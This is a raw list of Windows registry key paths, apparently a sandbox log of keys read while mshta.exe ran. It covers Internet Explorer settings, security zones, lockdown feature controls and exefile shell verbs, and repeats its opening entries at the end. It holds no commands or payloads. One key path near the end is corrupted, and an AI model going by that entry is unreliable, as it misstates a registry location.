HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Expand Alt Text
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Display Inline Images
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Display Inline Videos
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\Display Inline Videos
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Play_Background_Sounds
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Play_Animations
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Print_Background
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\Print_Background
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\SmoothScroll
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\SmoothScroll
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\XMLHTTP
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Show image placeholders
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\Show image placeholders
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Disable Script Debugger
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\DisableScriptDebuggerIE
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Disable Diagnostics Mode
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\Disable Diagnostics Mode
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Move System Caret
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Enable AutoImageResize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\Enable AutoImageResize
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\UseHR
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Q300829
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Cleanup HTCs
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\XDomainRequest
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\XDomainRequest
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\DOMStorage
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\DOMStorage
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\JScriptProfileCacheEventDelay
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\International
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\International\Default_CodePage
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\International\AutoDetect
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Internet Explorer\International\Scripts
HKEY_CURRENT_USER\Software\Policies\Microsoft\Internet Explorer\International\Scripts
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\International\Scripts
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\International\Scripts\Default_IEFontSizePrivate
HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\International\Scripts
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Internet Explorer\Settings
HKEY_CURRENT_USER\Software\Policies\Microsoft\Internet Explorer\Settings
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Settings
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Settings\Anchor Color
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Settings\Anchor Color Visited
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Settings\Anchor Color Hover
HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Settings
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Settings\Always Use My Colors
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Settings\Always Use My Font Size
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Settings\Always Use My Font Face
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Settings\Disable Visited Hyperlinks
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Settings\Use Anchor Hover Color
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Settings\MiscFlags
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Styles
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Text Scaling
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Viewport
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Larger Hit Test
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Script
HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\AdvancedOptions\DISAMBIGUATION
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\ActiveDesktop
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Allow Programmatic Cut_Copy_Paste
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\DisableCachingOfSSLPages
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\DisableCachingOfSSLPages
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\DisableCachingOfSSLPages
HKEY_CURRENT_USER\Software\Policies\Microsoft\Internet Explorer\Main
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\PageSetup
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\PageSetup\Print_Background
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\MenuExt
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel\(Default)
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel\Flags
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel\Contexts
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote\(Default)
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote\Flags
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote\Contexts
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Nls\CodePage
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CodePage\950
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_96DPI_PIXEL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_96DPI_PIXEL
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\International\Scripts\3
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\International\Scripts\3\IEFontSize
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\International\Scripts\3\IEFontSizePrivate
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\International\Scripts\3\IEPropFontName
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\International\Scripts\3\IEFixedFontName
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\International\Scripts\3\IESerifFontName
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\International\Scripts\3\IESansSerifFontName
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\International\Scripts\3\IEUIFontName
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\International\AcceptLanguage
HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Version Vector
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Version Vector\IE
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Version Vector\VML
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Version Vector\WindowsEdition
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_ZONE_ELEVATION
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_ZONE_ELEVATION
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_ZONE_ELEVATION\mshta.exe
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_ZONE_ELEVATION\*
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_DISABLE_NAVIGATION_SOUNDS
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_DISABLE_NAVIGATION_SOUNDS
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Internet Explorer\IEDevTools\Options
HKEY_CURRENT_USER\Software\Policies\Microsoft\Internet Explorer\IEDevTools\Options
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\IEDevTools\Options
HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\IEDevTools\Options
HKEY_CURRENT_USER\Software\Microsoft\Windows\Shell\Associations\MIMEAssociations\text/xml\UserChoice
HKEY_CLASSES_ROOT\MIME\Database\Content Type\text/xml
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\MIME\Database\Content Type\text/xml\CLSID
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\SyncMode5
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\SessionStartTimeDefaultDeltaSecs
HKEY_CURRENT_USER\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\MBCSAPIforCrack
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_HTTP_USERNAME_PASSWORD_DISABLE
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_HTTP_USERNAME_PASSWORD_DISABLE
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_HTTP_USERNAME_PASSWORD_DISABLE\mshta.exe
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{6C467336-8281-4E60-8204-430CED96822D}\InprocServer32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{6C467336-8281-4E60-8204-430CED96822D}\InprocServer32\LoadWithoutCOM
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\*\NoRecentDocs
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{6C467336-8281-4E60-8204-430CED96822D}\flags
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\PropertySystem\PropertyHandlers\.exe\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{66742402-F9B9-11D1-A202-0000F81FEDEE}\DisableProcessIsolation
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{66742402-F9B9-11D1-A202-0000F81FEDEE}\NoOplock
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{66742402-F9B9-11D1-A202-0000F81FEDEE}\UseInProcHandlerCache
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{66742402-F9B9-11D1-A202-0000F81FEDEE}\UseOutOfProcHandlerCache
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{09799AFB-AD67-11d1-ABCD-00C04FC30936}\flags
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\NoRecentDocs
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{21B22460-3AEA-1069-A2DC-08002B30309D}\flags
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\NoStaticDefaultVerb
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\open\ExplorerCommandHandler
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\open\command\DelegateExecute
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\runas\ExplorerCommandHandler
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\runas\command\DelegateExecute
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\runasuser\ExplorerCommandHandler
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\runasuser\command\DelegateExecute
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\runasuser\LegacyDisable
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\runasuser\CheckSupportedTypes
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\runasuser\SuppressionPolicy
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\runasuser\SuppressionPolicyEx
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\runasuser\SuppressionSlapiPolicy
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\runas\LegacyDisable
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\runas\CheckSupportedTypes
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\runas\SuppressionPolicyEx
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\runas\SuppressionSlapiPolicy
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\open\LegacyDisable
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\open\CheckSupportedTypes
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\open\SuppressionPolicy
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\open\SuppressionPolicyEx
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\open\SuppressionSlapiPolicy
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\open\CommandStateHandler
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\open\DefaultAppliesTo
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\open\CommandFlags
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\open\SubCommands
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\open\ExtendedSubCommandsKey
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\open\HasLUAShield
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\open\Extended
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\open\OnlyInBrowserWindow
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\open\ProgrammaticAccessOnly
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\open\MultiSelectModel
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MultipleInvokePromptMinimum
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MultipleInvokePromptMinimum
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\open\MUIVerb
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\open\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\open\ClientOnly
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\open\ImpliedSelectionModel
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\open\StaticVerbOnly
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\open\IsInContextMenu
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\open\PaneVisibleProperty
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\open\AppliesTo
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\open\ReadWriteRequired
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\open\DownloadInvokeDisabled
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\open\MaxDownloadFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\open\Position
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\open\SeparatorBefore
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\open\SeparatorAfter
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\runas\CommandStateHandler
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\runas\DefaultAppliesTo
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\runas\CommandFlags
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\runas\SubCommands
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\runas\ExtendedSubCommandsKey
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\runas\HasLUAShield
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\runas\Extended
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\runas\OnlyInBrowserWindow
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\runas\ProgrammaticAccessOnly
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\runas\MultiSelectModel
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\runas\MUIVerb
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\runas\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\runas\ClientOnly
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\runas\ImpliedSelectionModel
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\runas\StaticVerbOnly
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\runas\IsInContextMenu
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\runas\PaneVisibleProperty
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\runas\AppliesTo
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\runas\ReadWriteRequired
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\runas\DownloadInvokeDisabled
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\runas\MaxDownloadFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\runas\Position
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\runas\SeparatorBefore
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\runas\SeparatorAfter
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\runasuser\CommandStateHandler
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\runasuser\DefaultAppliesTo
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\runasuser\CommandFlags
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\runasuser\SubCommands
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\runasuser\ExtendedSubCommandsKey
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\runasuser\HasLUAShield
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\runasuser\Extended
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\open\NeverDefault
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\SystemFileAssociations\.exe\NoRecentDocs
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\SystemFileAssociations\.exe\NoStaticDefaultVerb
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\*\NoStaticDefaultVerb
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AllFilesystemObjects\NoRecentDocs
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AllFilesystemObjects\NoStaticDefaultVerb
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\lnkfile\NoStaticDefaultVerb
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileAssociation\AllowedReservedCharacters
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.ade\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.adp\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.asp\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.bas\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.bat\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.cer\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.chm\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.cmd\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.com\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.cpl\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.crt\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\CreateUriCacheSize
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\CreateUriCacheSize
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\CreateUriCacheSize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\CreateUriCacheSize
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\EnablePunycode
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\EnablePunycode
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\EnablePunycode
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\EnablePunycode
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Security\DisableSecuritySettingsCheck
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Security\DisableSecuritySettingsCheck
HKEY_LOCAL_MACHINE\SYSTEM\Setup\SystemSetupInProgress
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\Flags
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\Flags
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\Flags
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\Flags
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\Flags
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_LOCALMACHINE_LOCKDOWN\cmd.exe
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_LOCALMACHINE_LOCKDOWN\*
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_LOCALMACHINE_LOCKDOWN\cmd.exe
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_LOCALMACHINE_LOCKDOWN\*
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\SpecialFoldersCacheSize
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\SpecialFoldersCacheSize
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\SpecialFoldersCacheSize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\SpecialFoldersCacheSize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_PROTOCOL_LOCKDOWN\cmd.exe
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_PROTOCOL_LOCKDOWN\*
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\1806
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\1806
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\safer\codeidentifiers\TransparentEnabled
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\open\command\command
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\open\command\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\open\SetWorkingDirectoryFromTarget
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\open\NoWorkingDirectory
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\Compatibility Assistant\LogIgnoreMonitorReason
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mshta.exe\DisableUserModeCallbackFilter
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\DEPOff
\x1a60\xa7EY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{25336920-03F9-11CF-8FD0-00AA00686F13}\InProcServer32\(Default)
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\Sorting\Versions\00060101.00060101
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\RtfConverterFlags
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Use_DlgBox_Colors
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Anchor Underline
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\CSS_Compat
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Expand Alt Text
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Display Inline Images
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Display Inline Videos
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\Display Inline Videos
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Play_Background_Sounds
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Play_Animations
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Print_Background
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\Print_Background
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\SmoothScroll
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\SmoothScroll
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\XMLHTTP
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Show image placeholders
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\Show image placeholders
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Disable Script Debugger
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\DisableScriptDebuggerIE
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Disable Diagnostics Mode
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\Disable Diagnostics Mode
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Move System Caret
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Enable AutoImageResize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\Enable AutoImageResize
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\UseHR
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Q300829
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Cleanup HTCs
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\XDomainRequest
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\XDomainRequest
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\DOMStorage
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\DOMStorage
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\JScriptProfileCacheEventDelay
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\International\Default_CodePage
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\International\AutoDetect
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\International\Scripts\Default_IEFontSizePrivate
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Settings\Anchor Color
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Settings\Anchor Color Visited
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Settings\Anchor Color Hover
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Settings\Always Use My Colors
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Settings\Always Use My Font Size
